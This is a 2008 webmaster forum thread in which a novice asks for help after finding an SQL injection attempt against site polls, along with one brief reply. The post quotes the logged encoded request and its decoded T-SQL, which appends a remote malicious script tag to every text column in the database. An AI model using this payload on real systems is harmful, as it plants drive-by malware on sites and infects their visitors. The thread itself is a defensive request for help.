Welcome to WebmasterWorld Guest from

Forum Moderators: brotherhood of lan & mack

Message Too Old, No Replies

SQL injection attempt (php/MySQL) help

Advice needed for cleaning up hacked website

6:54 pm on Aug 10, 2008 (gmt 0)

New User

5+ Year Member

joined:Aug 10, 2008
votes: 0

I have a couple of very simple javascript polls on my site that use MySQL databases to count votes after the user selects an option using a radio button. Today, in our log, I noticed the following, which after researching, seems to be a SQL injection attempt similar to what has been going on lately:

"GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST
72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 6338 "-"

(note: I inserted page breaks so the code wouldn't stretch the page)

I translated it to this:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www.example.com/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

I know nothing about php/MySQL other than what I've learned to get the polls working. I used the phpMyAdmin section my webhost provides to check the table structures in the database, and didn't find anything different. Clicking the polls brings up the results just like they should, with no redirects or any other apparent problem.

The SQL is:

SELECT * FROM `revolvepoll_results` WHERE 1

with two fields (candidate and num_votes).

I am wondering if someone can clarify for me whether there is anything else I need to do? I read through the thread in the Databases section but the discussion is too sophisticated for a novice like me.

Thank you for any help you can give.

BTW, I've lurked here a while but forgot the screen name I used to sign up, thus the new sign-up date.

[edited by: mack at 10:29 pm (utc) on Aug. 10, 2008]
[edit reason] removed site url from code just to be safe [/edit]

10:22 pm on Aug 10, 2008 (gmt 0)

Senior Member

WebmasterWorld Senior Member rocknbil is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:Nov 28, 2004
votes: 0

Welcome aboard Norksie, have you seen this thread [webmasterworld.com]? Well discussed there.
10:58 pm on Aug 10, 2008 (gmt 0)

New User

5+ Year Member

joined:Aug 10, 2008
votes: 0

Yes, thank you rocknbil, I did read that thread before I posted in this forum, but as I said, it is too sophisticated for my understanding. The responses presume a level of knowledge I don't have, which is why I came to this "newbie" forum hoping for some simplified advice.

Perhaps I can boil down my questions to the fundamentals:

1) If I was able to execute my poll javascript from the webpage where it is located, and nothing happened except the poll results output page was generated, can I be sure the attack failed?

2) If I look at the structure of my table with phpMyAdmin, and it shows nothing more than what I set up, can be I sure nothing was inserted into the table? In other words, would it be obvious if something was there?

I am not a programmer, only a casual webmaster, and I just want to be sure my visitors don't end up with something malicious. Thank you again to anyone who has any input.